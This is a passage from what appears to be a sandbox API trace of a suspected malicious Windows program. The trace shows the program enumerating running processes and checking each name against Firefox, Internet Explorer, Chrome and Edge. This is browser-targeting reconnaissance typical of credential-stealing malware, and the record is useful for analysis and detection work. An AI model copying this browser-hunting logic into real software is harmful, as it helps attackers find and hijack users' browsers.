dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.244] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0216.244] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0216.244] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0216.244] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.244] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0216.244] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0216.244] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0216.244] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0216.244] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.244] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.245] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.245] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.245] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.245] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.245] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.245] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.245] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.245] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.245] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.245] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.246] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.246] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.246] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.246] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.246] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.247] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.247] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.247] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.247] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.247] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.247] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.247] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.247] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.247] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.247] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.248] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0216.248] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0216.248] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0216.248] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.248] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.248] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.248] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.248] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.248] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.248] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.249] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.249] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.249] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.249] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.249] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.249] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0216.249] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0216.249] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0216.249] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.250] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.250] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0216.250] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0216.250] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0216.250] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.250] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.251] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0216.251] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0216.251] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0216.251] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.251] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.251] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.251] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.251] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.251] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.251] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0216.252] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0216.252] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0216.252] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0216.252] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.252] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0216.252] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0216.252] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0216.252] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0216.252] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.252] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0216.253] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0216.253] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0216.253] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0216.253] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.253] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0216.253] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0216.253] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0216.253] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0216.253] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.253] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0216.254] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0216.254] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0216.254] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0216.254] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.254] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0216.254] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0216.254] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0216.254] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0216.254] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.255] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0216.255] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0216.255] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0216.255] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0216.255] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.255] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0216.256] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0216.256] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0216.256] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0216.256] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.256] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0216.256] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0216.256] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0216.256] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0216.256] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.256] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0216.257] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0216.257] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0216.257] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0216.257] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.257] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0216.257] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0216.257] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0216.257] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0216.257] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.257] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0216.258] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0216.258] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0216.258] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0216.258] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.258] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0216.259] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0216.259] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0216.259] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0216.259] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.259] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0216.259] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0216.259] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0216.259] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0216.259] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.259] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0216.260] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0216.260] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0216.260] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0216.260] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.260] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0216.260] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0216.260] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0216.260] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0216.260] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.260] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0216.261] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0216.261] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0216.261] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0216.261] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.261] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0216.261] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0216.261] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0216.261] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0216.261] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.262] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0216.262] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0216.262] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0216.262] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0216.262] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.262] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0216.263] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0216.263] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0216.263] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0216.263] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.263] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0216.263] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0216.263] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0216.263] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0216.263] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.263] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0216.264] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0216.264] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0216.264] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0216.264] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.264] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.264] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0216.264] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0216.264] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0216.264] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.264] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.265] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.265] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.265] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.265] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.265] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0216.265] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0216.265] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0216.265] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0216.265] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.266] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.266] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0216.266] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0216.266] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0216.266] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.266] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.267] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0216.267] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0216.267] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0216.267] 